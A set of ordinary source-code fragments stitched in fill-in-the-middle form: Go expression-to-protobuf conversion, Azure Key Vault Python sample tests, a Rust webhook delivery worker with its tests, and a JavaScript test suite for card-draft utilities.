val = codec.EncodeDecimal(nil, d)
default:
return nil
}
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
return &tipb.Expr{Tp: tp, Val: val}
}
func (pc pbConverter) columnToPBExpr(column *Column) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_ColumnRef)) {
return nil
}
switch column.GetType().Tp {
case mysql.TypeBit, mysql.TypeSet, mysql.TypeEnum, mysql.TypeGeometry, mysql.TypeUnspecified:
return nil
}
if pc.client.IsRequestTypeSupported(kv.ReqTypeDAG, kv.ReqSubTypeBasic) {
return &tipb.Expr{
Tp: tipb.ExprType_ColumnRef,
Val: codec.EncodeInt(nil, int64(column.Index)),
}
}
id := column.ID
// Zero Column ID is not a column from table, can not support for now.
if id == 0 || id == -1 {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_ColumnRef,
Val: codec.EncodeInt(nil, id)}
}
func (pc pbConverter) scalarFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
switch expr.FuncName.L {
case ast.LT, ast.LE, ast.EQ, ast.NE, ast.GE, ast.GT,
ast.NullEQ, ast.In, ast.Like:
return pc.compareOpsToPBExpr(expr)
case ast.Plus, ast.Minus, ast.Mul, ast.Div, ast.Mod, ast.IntDiv:
return pc.arithmeticalOpsToPBExpr(expr)
case ast.AndAnd, ast.OrOr, ast.UnaryNot, ast.LogicXor:
return pc.logicalOpsToPBExpr(expr)
case ast.And, ast.Or, ast.BitNeg, ast.Xor, ast.LeftShift, ast.RightShift:
return pc.bitwiseFuncToPBExpr(expr)
case ast.Case, ast.Coalesce, ast.If, ast.Ifnull, ast.IsNull, ast.Nullif:
return pc.builtinFuncToPBExpr(expr)
default:
return nil
}
}
func (pc pbConverter) compareOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.LT:
tp = tipb.ExprType_LT
case ast.LE:
tp = tipb.ExprType_LE
case ast.EQ:
tp = tipb.ExprType_EQ
case ast.NE:
tp = tipb.ExprType_NE
case ast.GE:
tp = tipb.ExprType_GE
case ast.GT:
tp = tipb.ExprType_GT
case ast.NullEQ:
tp = tipb.ExprType_NullEQ
case ast.In:
return pc.inToPBExpr(expr)
case ast.Like:
return pc.likeToPBExpr(expr)
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) likeToPBExpr(expr *ScalarFunction) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_Like)) {
return nil
}
// Only patterns like 'abc', '%abc', 'abc%', '%abc%' can be converted to *tipb.Expr for now.
escape := expr.GetArgs()[2].(*Constant).Value
if escape.IsNull() || byte(escape.GetInt64()) != '\\' {
return nil
}
pattern, ok := expr.GetArgs()[1].(*Constant)
if !ok || pattern.Value.Kind() != types.KindString {
return nil
}
for i, b := range pattern.Value.GetString() {
switch b {
case '\\', '_':
return nil
case '%':
if i != 0 && i != len(pattern.Value.GetString())-1 {
return nil
}
}
}
expr0 := pc.exprToPB(expr.GetArgs()[0])
if expr0 == nil {
return nil
}
expr1 := pc.exprToPB(expr.GetArgs()[1])
if expr1 == nil {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_Like,
Children: []*tipb.Expr{expr0, expr1}}
}
func (pc pbConverter) arithmeticalOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.Plus:
tp = tipb.ExprType_Plus
case ast.Minus:
tp = tipb.ExprType_Minus
case ast.Mul:
tp = tipb.ExprType_Mul
case ast.Div:
tp = tipb.ExprType_Div
case ast.Mod:
tp = tipb.ExprType_Mod
case ast.IntDiv:
tp = tipb.ExprType_IntDiv
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) logicalOpsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.AndAnd:
tp = tipb.ExprType_And
case ast.OrOr:
tp = tipb.ExprType_Or
case ast.LogicXor:
tp = tipb.ExprType_Xor
case ast.UnaryNot:
tp = tipb.ExprType_Not
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) bitwiseFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.And:
tp = tipb.ExprType_BitAnd
case ast.Or:
tp = tipb.ExprType_BitOr
case ast.Xor:
tp = tipb.ExprType_BitXor
case ast.LeftShift:
tp = tipb.ExprType_LeftShift
case ast.RightShift:
tp = tipb.ExprType_RighShift
case ast.BitNeg:
tp = tipb.ExprType_BitNeg
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) inToPBExpr(expr *ScalarFunction) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_In)) {
return nil
}
pbExpr := pc.exprToPB(expr.GetArgs()[0])
if pbExpr == nil {
return nil
}
listExpr := pc.constListToPB(expr.GetArgs()[1:])
if listExpr == nil {
return nil
}
return &tipb.Expr{
Tp: tipb.ExprType_In,
Children: []*tipb.Expr{pbExpr, listExpr}}
}
func (pc pbConverter) constListToPB(list []Expression) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tipb.ExprType_ValueList)) {
return nil
}
// Only list of *Constant can be push down.
datums := make([]types.Datum, 0, len(list))
for _, expr := range list {
v, ok := expr.(*Constant)
if !ok {
return nil
}
d := pc.datumToPBExpr(v.Value)
if d == nil {
return nil
}
datums = append(datums, v.Value)
}
return pc.datumsToValueList(datums)
}
func (pc pbConverter) datumsToValueList(datums []types.Datum) *tipb.Expr {
// Don't push value list that has different datum kind.
prevKind := types.KindNull
for _, d := range datums {
if prevKind == types.KindNull {
prevKind = d.Kind()
}
if !d.IsNull() && d.Kind() != prevKind {
return nil
}
}
err := types.SortDatums(pc.sc, datums)
if err != nil {
log.Error(err.Error())
return nil
}
val, err := codec.EncodeValue(nil, datums...)
if err != nil {
log.Error(err.Error())
return nil
}
return &tipb.Expr{Tp: tipb.ExprType_ValueList, Val: val}
}
// GroupByItemToPB converts group by items to pb.
func GroupByItemToPB(sc *variable.StatementContext, client kv.Client, expr Expression) *tipb.ByItem {
pc := pbConverter{client: client, sc: sc}
e := pc.exprToPB(expr)
if e == nil {
return nil
}
return &tipb.ByItem{Expr: e}
}
// SortByItemToPB converts order by items to pb.
func SortByItemToPB(sc *variable.StatementContext, client kv.Client, expr Expression, desc bool) *tipb.ByItem |
// AggFuncToPBExpr converts aggregate function to pb.
func AggFuncToPBExpr(sc *variable.StatementContext, client kv.Client, aggFunc AggregationFunction) *tipb.Expr {
if aggFunc.IsDistinct() {
return nil
}
pc := pbConverter{client: client, sc: sc}
var tp tipb.ExprType
switch aggFunc.GetName() {
case ast.AggFuncCount:
tp = tipb.ExprType_Count
case ast.AggFuncFirstRow:
tp = tipb.ExprType_First
case ast.AggFuncGroupConcat:
tp = tipb.ExprType_GroupConcat
case ast.AggFuncMax:
tp = tipb.ExprType_Max
case ast.AggFuncMin:
tp = tipb.ExprType_Min
case ast.AggFuncSum:
tp = tipb.ExprType_Sum
case ast.AggFuncAvg:
tp = tipb.ExprType_Avg
}
if !client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
children := make([]*tipb.Expr, 0, len(aggFunc.GetArgs()))
for _, arg := range aggFunc.GetArgs() {
pbArg := pc.exprToPB(arg)
if pbArg == nil {
return nil
}
children = append(children, pbArg)
}
return &tipb.Expr{Tp: tp, Children: children}
}
func (pc pbConverter) builtinFuncToPBExpr(expr *ScalarFunction) *tipb.Expr {
switch expr.FuncName.L {
case ast.Case, ast.If, ast.Ifnull, ast.Nullif:
return pc.controlFuncsToPBExpr(expr)
case ast.Coalesce, ast.IsNull:
return pc.otherFuncsToPBExpr(expr)
default:
return nil
}
}
func (pc pbConverter) otherFuncsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.Coalesce:
tp = tipb.ExprType_Coalesce
case ast.IsNull:
tp = tipb.ExprType_IsNull
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) controlFuncsToPBExpr(expr *ScalarFunction) *tipb.Expr {
var tp tipb.ExprType
switch expr.FuncName.L {
case ast.If:
tp = tipb.ExprType_If
case ast.Ifnull:
tp = tipb.ExprType_IfNull
case ast.Case:
tp = tipb.ExprType_Case
case ast.Nullif:
tp = tipb.ExprType_NullIf
}
return pc.convertToPBExpr(expr, tp)
}
func (pc pbConverter) convertToPBExpr(expr *ScalarFunction, tp tipb.ExprType) *tipb.Expr {
if !pc.client.IsRequestTypeSupported(kv.ReqTypeSelect, int64(tp)) {
return nil
}
children := make([]*tipb.Expr, 0, len(expr.GetArgs()))
for _, arg := range expr.GetArgs() {
pbArg := pc.exprToPB(arg)
if pbArg == nil {
return nil
}
children = append(children, pbArg)
}
return &tipb.Expr{Tp: tp, Children: children}
}
| {
pc := pbConverter{client: client, sc: sc}
e := pc.exprToPB(expr)
if e == nil {
return nil
}
return &tipb.ByItem{Expr: e, Desc: desc}
} |
test_samples_keys.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from __future__ import print_function
import functools
import hashlib
import os
from azure.core.exceptions import ResourceNotFoundError
from devtools_testutils import ResourceGroupPreparer, KeyVaultPreparer
from keys_preparer import VaultClientPreparer
from keys_test_case import KeyVaultTestCase
def print(*args):
assert all(arg is not None for arg in args)
def test_create_key_client():
vault_url = "vault_url"
# pylint:disable=unused-variable
# [START create_key_client]
from azure.identity import DefaultAzureCredential
from azure.keyvault.keys import KeyClient
# Create a KeyClient using default Azure credentials
credential = DefaultAzureCredential()
key_client = KeyClient(vault_url, credential)
# [END create_key_client]
class TestExamplesKeyVault(KeyVaultTestCase):
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_key_crud_operations(self, vault_client, **kwargs):
from dateutil import parser as date_parse
key_client = vault_client.keys
# [START create_key]
from dateutil import parser as date_parse
expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
# create a key with optional arguments
key = key_client.create_key("key-name", "RSA-HSM", expires_on=expires_on)
print(key.name)
print(key.id)
print(key.key_type)
print(key.properties.expires_on)
# [END create_key]
# [START create_rsa_key]
key_size = 2048
key_ops = ["encrypt", "decrypt", "sign", "verify", "wrapKey", "unwrapKey"]
# create an rsa key with size specification
# RSA key can be created with default size of '2048'
key = key_client.create_rsa_key("key-name", hardware_protected=True, size=key_size, key_operations=key_ops)
print(key.id)
print(key.name)
print(key.key_type)
print(key.key_operations)
# [END create_rsa_key]
# [START create_ec_key]
key_curve = "P-256"
# create an EC (Elliptic curve) key with curve specification
# EC key can be created with default curve of 'P-256'
ec_key = key_client.create_ec_key("key-name", curve=key_curve)
print(ec_key.id)
print(ec_key.properties.version)
print(ec_key.key_type)
print(ec_key.key.crv)
# [END create_ec_key]
# [START get_key]
# get the latest version of a key
key = key_client.get_key("key-name")
# alternatively, specify a version
key_version = key.properties.version
key = key_client.get_key("key-name", key_version)
print(key.id)
print(key.name)
print(key.properties.version)
print(key.key_type)
print(key.properties.vault_url)
# [END get_key]
# [START update_key]
# update attributes of an existing key
expires_on = date_parse.parse("2050-01-02T08:00:00.000Z")
tags = {"foo": "updated tag"}
updated_key = key_client.update_key_properties(key.name, expires_on=expires_on, tags=tags)
print(updated_key.properties.version)
print(updated_key.properties.updated_on)
print(updated_key.properties.expires_on)
print(updated_key.properties.tags)
print(key.key_type)
# [END update_key]
# [START delete_key]
# delete a key
deleted_key_poller = key_client.begin_delete_key("key-name")
deleted_key = deleted_key_poller.result()
print(deleted_key.name)
# if the vault has soft-delete enabled, the key's deleted_date,
# scheduled purge date and recovery id are set
print(deleted_key.deleted_date)
print(deleted_key.scheduled_purge_date)
print(deleted_key.recovery_id)
# if you want to block until deletion is complete, call wait() on the poller
deleted_key_poller.wait()
# [END delete_key]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_key_list_operations(self, vault_client, **kwargs):
key_client = vault_client.keys
for i in range(4):
key_client.create_ec_key("key{}".format(i))
for i in range(4):
key_client.create_rsa_key("key{}".format(i))
# [START list_keys]
# get an iterator of keys
keys = key_client.list_properties_of_keys()
for key in keys:
print(key.id)
print(key.name)
# [END list_keys]
# [START list_properties_of_key_versions]
# get an iterator of a key's versions
key_versions = key_client.list_properties_of_key_versions("key-name")
for key in key_versions:
print(key.id)
print(key.name)
# [END list_properties_of_key_versions]
# [START list_deleted_keys]
# get an iterator of deleted keys (requires soft-delete enabled for the vault)
deleted_keys = key_client.list_deleted_keys()
for key in deleted_keys:
print(key.id)
print(key.name)
print(key.scheduled_purge_date)
print(key.recovery_id)
print(key.deleted_date)
# [END list_deleted_keys]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer()
@VaultClientPreparer()
def test_example_keys_backup_restore(self, vault_client, **kwargs):
key_client = vault_client.keys
created_key = key_client.create_key("keyrec", "RSA")
key_name = created_key.name
# [START backup_key]
# backup key
key_backup = key_client.backup_key(key_name)
# returns the raw bytes of the backed up key
print(key_backup)
# [END backup_key]
key_client.begin_delete_key(key_name).wait()
# [START restore_key_backup]
# restore a key backup
restored_key = key_client.restore_key_backup(key_backup)
print(restored_key.id)
print(restored_key.properties.version)
# [END restore_key_backup]
@ResourceGroupPreparer(random_name_enabled=True)
@KeyVaultPreparer(enable_soft_delete=True)
@VaultClientPreparer()
def test_example_keys_recover(self, vault_client, **kwargs):
| key_client = vault_client.keys
created_key = key_client.create_key("key-name", "RSA")
key_client.begin_delete_key(created_key.name).wait()
# [START get_deleted_key]
# get a deleted key (requires soft-delete enabled for the vault)
deleted_key = key_client.get_deleted_key("key-name")
print(deleted_key.name)
# if the vault has soft-delete enabled, the key's deleted_date
# scheduled purge date and recovery id are set
print(deleted_key.deleted_date)
print(deleted_key.scheduled_purge_date)
print(deleted_key.recovery_id)
# [END get_deleted_key]
# [START recover_deleted_key]
# recover a deleted key to its latest version (requires soft-delete enabled for the vault)
recover_key_poller = key_client.begin_recover_deleted_key("key-name")
recovered_key = recover_key_poller.result()
print(recovered_key.id)
print(recovered_key.name)
# if you want to block until key is recovered server-side, call wait() on the poller
recover_key_poller.wait()
# [END recover_deleted_key] |
|
worker.rs | // SPDX-FileCopyrightText: © 2022 Svix Authors
// SPDX-License-Identifier: MIT
use crate::cfg::Configuration;
use crate::core::{
cache::Cache,
message_app::{CreateMessageApp, CreateMessageEndpoint},
types::{EndpointHeaders, EndpointSecret, MessageAttemptTriggerType, MessageId, MessageStatus},
};
use crate::db::models::{message, messageattempt, messagedestination};
use crate::error::{Error, Result};
use crate::queue::{MessageTask, QueueTask, TaskQueueConsumer, TaskQueueProducer};
use chrono::Utc;
use futures::future;
use reqwest::header::{HeaderMap, HeaderName};
use sea_orm::{entity::prelude::*, ActiveValue::Set, DatabaseConnection, EntityTrait};
use tokio::time::{sleep, Duration};
use std::{iter, str::FromStr};
const USER_AGENT: &str = concat!("Svix-Webhooks/", env!("CARGO_PKG_VERSION"));
/// Generates a set of headers for any one webhook event
fn generate_msg_headers(
timestamp: i64,
whitelabel_headers: bool,
body: &str,
msg_id: &MessageId,
configured_headers: Option<&EndpointHeaders>,
endpoint_signing_keys: &[&EndpointSecret],
_endpoint_url: &str,
) -> HeaderMap {
let to_sign = format!("{}.{}.{}", msg_id, timestamp, body);
let signatures = endpoint_signing_keys
.iter()
.map(|x| hmac_sha256::HMAC::mac(to_sign.as_bytes(), &x.0[..]));
let signatures_str = signatures
.map(|x| format!("v1,{}", base64::encode(x)))
.collect::<Vec<String>>()
.join(" ");
let mut headers = HeaderMap::new();
let id = msg_id.0.parse().expect("Error parsing message id");
let timestamp = timestamp
.to_string()
.parse()
.expect("Error parsing message timestamp");
let signatures_str = signatures_str
.parse()
.expect("Error parsing message signatures");
if whitelabel_headers {
headers.insert("webhook-id", id);
headers.insert("webhook-timestamp", timestamp);
headers.insert("webhook-signature", signatures_str);
} else {
headers.insert("svix-id", id);
headers.insert("svix-timestamp", timestamp);
headers.insert("svix-signature", signatures_str);
}
if let Some(configured_headers) = configured_headers {
for (k, v) in &configured_headers.0 {
if let (Ok(k), Ok(v)) = (HeaderName::from_str(k), v.parse()) {
headers.insert(k, v);
} else {
tracing::error!("Invalid HeaderName or HeaderValues for `{}: {}`", k, v);
}
}
}
headers
}
/// Dispatches one webhook
async fn d |
cfg: Configuration,
db: &DatabaseConnection,
queue_tx: &TaskQueueProducer,
payload: &Json,
msg_task: MessageTask,
endp: CreateMessageEndpoint,
) -> Result<()> {
tracing::trace!("Dispatch: {} {}", &msg_task.msg_id, &endp.id);
let body = serde_json::to_string(&payload).expect("Error parsing message body");
let headers = {
let keys: Vec<&EndpointSecret> = if let Some(ref old_keys) = endp.old_signing_keys {
iter::once(&endp.key)
.chain(old_keys.0.iter().map(|x| &x.key))
.collect()
} else {
vec![&endp.key]
};
let mut headers = generate_msg_headers(
Utc::now().timestamp(),
cfg.whitelabel_headers,
&body,
&msg_task.msg_id,
endp.headers.as_ref(),
&keys,
&endp.url,
);
headers.insert("user-agent", USER_AGENT.to_string().parse().unwrap());
headers
};
let client = reqwest::Client::builder()
.redirect(reqwest::redirect::Policy::none())
.build()
.expect("Invalid reqwest Client configuration");
let res = client
.post(&endp.url)
.headers(headers)
.timeout(Duration::from_secs(cfg.worker_request_timeout as u64))
.json(&payload)
.send()
.await;
let msg_dest = messagedestination::Entity::secure_find_by_msg(msg_task.msg_id.clone())
.filter(messagedestination::Column::EndpId.eq(endp.id.clone()))
.one(db)
.await?
.ok_or_else(|| {
Error::Generic(format!(
"Msg dest not found {} {}",
msg_task.msg_id, endp.id
))
})?;
if (msg_dest.status != MessageStatus::Pending && msg_dest.status != MessageStatus::Sending)
&& (msg_task.trigger_type != MessageAttemptTriggerType::Manual)
{
// TODO: it happens when this message destination is "resent". This leads to 2 queue tasks with the same message destination
tracing::warn!(
"MessageDestination {} is not pending (it's {:?}).",
msg_dest.id,
msg_dest.status
);
return Ok(());
}
let attempt = messageattempt::ActiveModel {
msg_id: Set(msg_task.msg_id.clone()),
endp_id: Set(endp.id.clone()),
msg_dest_id: Set(msg_dest.id.clone()),
url: Set(endp.url.clone()),
ended_at: Set(Some(Utc::now().into())),
trigger_type: Set(msg_task.trigger_type),
..Default::default()
};
let attempt = match res {
Ok(res) => {
let status_code = res.status().as_u16() as i16;
let status = if res.status().is_success() {
MessageStatus::Success
} else {
MessageStatus::Fail
};
let http_error = res.error_for_status_ref().err();
let bytes = res
.bytes()
.await
.expect("Could not read endpoint response body");
let body = bytes_to_string(bytes);
let attempt = messageattempt::ActiveModel {
response_status_code: Set(status_code),
response: Set(body),
status: Set(status),
..attempt
};
match http_error {
Some(err) => Err((attempt, err)),
None => Ok(attempt),
}
}
Err(err) => {
let attempt = messageattempt::ActiveModel {
response_status_code: Set(0),
response: Set("".to_owned()),
status: Set(MessageStatus::Fail),
..attempt
};
Err((attempt, err))
}
};
match attempt {
Ok(attempt) => {
let _attempt = attempt.insert(db).await?;
let msg_dest = messagedestination::ActiveModel {
status: Set(MessageStatus::Success),
next_attempt: Set(None),
..msg_dest.into()
};
let msg_dest = msg_dest.update(db).await?;
tracing::trace!("Worker success: {} {}", &msg_dest.id, &endp.id,);
}
Err((attempt, err)) => {
let _attempt = attempt.insert(db).await?;
let attempt_count = msg_task.attempt_count as usize;
if msg_task.trigger_type == MessageAttemptTriggerType::Manual {
tracing::debug!("Manual retry failed");
} else if attempt_count < cfg.retry_schedule.len() {
tracing::debug!(
"Worker failure retrying for attempt {}: {} {} {}",
attempt_count,
err,
&msg_dest.id,
&endp.id
);
let duration = cfg.retry_schedule[attempt_count];
let msg_dest = messagedestination::ActiveModel {
next_attempt: Set(Some(
(Utc::now()
+ chrono::Duration::from_std(duration)
.expect("Error parsing duration"))
.into(),
)),
..msg_dest.into()
};
let _msg_dest = msg_dest.update(db).await?;
queue_tx
.send(
QueueTask::MessageV1(MessageTask {
attempt_count: msg_task.attempt_count + 1,
..msg_task
}),
Some(duration),
)
.await?;
} else {
tracing::debug!(
"Worker failure attempts exhausted: {} {} {}",
err,
&msg_dest.id,
&endp.id
);
let msg_dest = messagedestination::ActiveModel {
status: Set(MessageStatus::Fail),
next_attempt: Set(None),
..msg_dest.into()
};
let _msg_dest = msg_dest.update(db).await?;
}
}
}
Ok(())
}
fn bytes_to_string(bytes: bytes::Bytes) -> String {
match std::str::from_utf8(&bytes.to_vec()) {
Ok(v) => v.to_owned(),
Err(_) => base64::encode(&bytes),
}
}
/// Manages preparation and execution of a QueueTask type
async fn process_task(
cfg: Configuration,
db: &DatabaseConnection,
cache: Cache,
queue_tx: &TaskQueueProducer,
queue_task: QueueTask,
) -> Result<()> {
let msg = message::Entity::find_by_id(queue_task.clone().msg_id())
.one(db)
.await?
.ok_or_else(|| {
Error::Generic(format!(
"Unexpected: message doesn't exist {}",
queue_task.clone().msg_id()
))
})?;
let payload = msg.payload.as_ref().expect("Message payload is NULL");
let create_message_app = CreateMessageApp::layered_fetch(
cache.clone(),
db,
None,
msg.app_id.clone(),
msg.org_id.clone(),
Duration::from_secs(30),
)
.await?
.ok_or_else(|| Error::Generic(format!("Application doesn't exist: {}", &msg.app_id)))?;
let endpoints: Vec<CreateMessageEndpoint> = create_message_app
.filtered_endpoints(queue_task.clone().trigger_type(), &msg)
.iter()
.filter(|endpoint| match &queue_task {
QueueTask::MessageV1(task) => task.endpoint_id == endpoint.id,
QueueTask::MessageBatch(_) => true,
})
.cloned()
.collect();
// TODO: remove this section once destinations are obsolete
if matches!(queue_task, QueueTask::MessageBatch(_)) {
let destinations = endpoints
.iter()
.map(|endpoint| messagedestination::ActiveModel {
msg_id: Set(msg.id.clone()),
endp_id: Set(endpoint.id.clone()),
next_attempt: Set(Some(Utc::now().into())),
status: Set(MessageStatus::Sending),
..Default::default()
});
messagedestination::Entity::insert_many(destinations)
.exec(db)
.await?;
}
let futures: Vec<_> = endpoints
.iter()
.map(|endpoint| {
dispatch(
cfg.clone(),
db,
queue_tx,
payload,
queue_task.clone().to_msg_task(endpoint.id.clone()),
endpoint.to_owned(),
)
})
.collect();
let join = future::join_all(futures).await;
let errs: Vec<_> = join.iter().filter(|x| x.is_err()).collect();
if !errs.is_empty() {
return Err(Error::Generic(format!(
"Some dispatches failed unexpectedly: {:?}",
errs
)));
}
Ok(())
}
/// Listens on the message queue for new tasks
pub async fn worker_loop(
cfg: &Configuration,
pool: &DatabaseConnection,
cache: Cache,
queue_tx: TaskQueueProducer,
mut queue_rx: TaskQueueConsumer,
) -> Result<()> {
loop {
match queue_rx.receive_all().await {
Ok(batch) => {
for delivery in batch {
let cfg = cfg.clone();
let pool = pool.clone();
let cache = cache.clone();
let queue_tx = queue_tx.clone();
let queue_task = delivery.task.clone();
tokio::spawn(async move {
if let Err(err) =
process_task(cfg.clone(), &pool, cache.clone(), &queue_tx, queue_task)
.await
{
tracing::error!("Error executing task: {}", err);
queue_tx
.nack(delivery)
.await
.expect("Error sending 'nack' to Redis after task execution error");
} else {
queue_tx.ack(delivery).await.expect(
"Error sending 'ack' to Redis after successful task execution",
);
}
});
}
}
Err(err) => {
tracing::error!("Error receiving task: {}", err);
sleep(Duration::from_millis(10)).await;
}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::core::types::BaseId;
use bytes::Bytes;
use std::collections::HashMap;
// [`generate_msg_headers`] tests
const TIMESTAMP: i64 = 1;
const WHITELABEL_HEADERS: bool = false;
const BODY: &str = "{\"test\": \"body\"}";
const ENDPOINT_SIGNING_KEYS: &[&EndpointSecret] = &[];
const ENDPOINT_URL: &str = "http://localhost:8071";
/// Utility function that returns the default set of headers before configurable header are
/// accounted for
fn mock_headers() -> (HeaderMap, MessageId) {
let id = MessageId::new(None, None);
(
generate_msg_headers(
TIMESTAMP,
WHITELABEL_HEADERS,
BODY,
&id,
None,
ENDPOINT_SIGNING_KEYS,
ENDPOINT_URL,
),
id,
)
}
// Tests configurable headers with a valid and an invalid header. The valid header pair should
// be included, while the invalid pair should be skipped.
#[test]
fn test_generate_msg_headers_with_custom_headers() {
// The headers to be given to [`generate_msg_headers`]
let mut headers = HashMap::new();
headers.insert("test_key".to_owned(), "value".to_owned());
headers.insert("invälid_key".to_owned(), "value".to_owned());
// The invalid key should be skipped over so it is not included in the expected
let (mut expected, id) = mock_headers();
let _ = expected.insert("test_key", "value".parse().unwrap());
let actual = generate_msg_headers(
TIMESTAMP,
WHITELABEL_HEADERS,
BODY,
&id,
Some(&EndpointHeaders(headers)),
ENDPOINT_SIGNING_KEYS,
ENDPOINT_URL,
);
assert_eq!(expected, actual);
}
// Tests endpoint signing keys -- expected values are fetched from the Svix documentation for a
// direct comparison to the current implementation.
#[test]
fn test_generate_msg_headers_with_signing_key() {
let test_timestamp = 1614265330;
let test_body = "{\"test\": 2432232314}";
let test_key = EndpointSecret(base64::decode("MfKQ9r8GKYqrTwjUPD8ILPZIo2LaLaSw").unwrap());
let test_message_id = MessageId("msg_p5jXN8AQM9LWM0D4loKWxJek".to_owned());
let expected_signature_str = "v1,g0hM9SsE+OTPJTGt/tmIKtSyZlE3uFJELVlNIOLJ1OE=";
let actual = generate_msg_headers(
test_timestamp,
WHITELABEL_HEADERS,
test_body,
&test_message_id,
None,
&[&test_key],
ENDPOINT_URL,
);
assert_eq!(
actual.get("svix-signature").unwrap(),
expected_signature_str
);
}
#[test]
fn test_bytes_to_string() {
let b = Bytes::from_static(b"Hello, world.");
assert_eq!(bytes_to_string(b), "Hello, world.");
}
}
| ispatch( |
draftutil.test.js | const sinon = require('sinon');
const fixturesPath = 'fixtures';
const cubefixture = require('../../../fixtures/examplecube');
let CardRating = require('../../../models/cardrating');
let Draft = require('../../../models/draft');
const carddb = require('../../../serverjs/cards');
import Filter from '../../../src/utils/Filter';
import methods from '../../../src/utils/draftutil';
import { expectOperator } from '../../helpers';
describe('getDraftBots', () => {
it('can get the correct number of draft bots', () => {
const params = {
seats: 5,
};
const result = methods.getDraftBots(params);
expect(result.length).toBe(params.seats - 1);
});
it('can get bots with the correct properties', () => {
const allColors = ['W', 'U', 'B', 'R', 'G'];
const params = {
seats: 2,
};
const result = methods.getDraftBots(params);
expect(result[0].length).toBe(2);
expect(allColors.includes(result[0][0])).toBe(true);
expect(allColors.includes(result[0][1])).toBe(true);
expect(result[0][0] === result[0][1]).toBe(false);
});
});
describe('getDraftFormat', () => {
let exampleCube;
it('returns the default format if params are < 0', () => {
let params = {
id: -1,
seats: 4,
packs: 3,
cards: 2,
};
const format = methods.getDraftFormat(params, exampleCube);
let expected_format = [
['*', '*'], // pack 1 (* is any card)
['*', '*'], // pack 2
['*', '*'], // pack 3
];
expected_format.custom = false;
expected_format.multiples = false;
expect(format).toEqual(expected_format);
expect(format.custom).toBe(false);
expect(format.multiples).toBe(false);
});
describe('returns a custom format if params are > 0', () => {
let params;
beforeAll(() => {
params = { id: 0, seats: 8 }; // packs and cards determined by custom format
exampleCube = {};
exampleCube.draft_formats = [];
exampleCube.draft_formats[0] = {}; // mock
});
let expectedFilters = function(...args) {
let expectedFormat = [];
args.forEach((filterText) => {
if (filterText !== null) {
let tokens = [];
Filter.tokenizeInput(filterText, tokens);
filterText = Filter.parseTokens(tokens); | };
describe.each([
[
'example filters - 1 pack, 1 card',
'[["rarity:Mythic,tag:New,identity>1"]]', // filter JSON
false, // multiples
[[expectedFilters('rarity:Mythic', 'tag:New', 'identity>1')]],
],
[
'example filters - 1 pack, 2 cards, allow multiples',
'[["rarity:Mythic,tag:New,identity>1", "tag:mytag"]]', // filter JSON
true, // multiples
[[expectedFilters('rarity:Mythic', 'tag:New', 'identity>1'), expectedFilters('tag:mytag')]],
],
[
'backwards compatible tags',
'[["mytag,*,*"]]', // filter JSON
false, // multiples
[[expectedFilters('tag:mytag', null, null)]],
],
[
'mixed filters and tags with multiple packs with different card counts',
'[["rarity:Mythic,mytag"],["*"],["rarity:mythic,rarity:common","*"]]', // filter JSON
false, // multiples
[
[expectedFilters('rarity:Mythic', 'tag:mytag')], // pack 1
[[[null]]], // pack 2
[expectedFilters('rarity:Mythic', 'rarity:common'), [[null]]], // pack 3
],
],
])('%s', (name, packsFormat, multiples, expected) => {
test(`returns expected format`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
// NOTE: Because format array als incudes properties (which we aren't testing in this test)
// we need to convert to json to compare safely.
// See https://github.com/facebook/jest/issues/8475
let formatJSON = JSON.stringify(methods.getDraftFormat(params, exampleCube));
let expectedJSON = JSON.stringify(expected);
expect(formatJSON).toEqual(expectedJSON);
});
test(`returned has correct multiples value`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
expect(methods.getDraftFormat(params, exampleCube).multiples).toEqual(multiples);
});
test(`returned format is marked as custom`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
expect(methods.getDraftFormat(params, exampleCube).custom).toEqual(true);
});
});
});
});
describe('populateDraft', () => {
let draft, format, cards, bots, seats;
beforeAll(() => {
draft = new Draft();
format = [];
cards = [];
bots = [];
seats = 8;
});
it('returns an error if no cards supplied', () => {
cards = [];
bots = ['fakebot'];
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/no cards/);
});
it('returns an error if no bots supplied', () => {
cards = ['mockcard'];
bots = [];
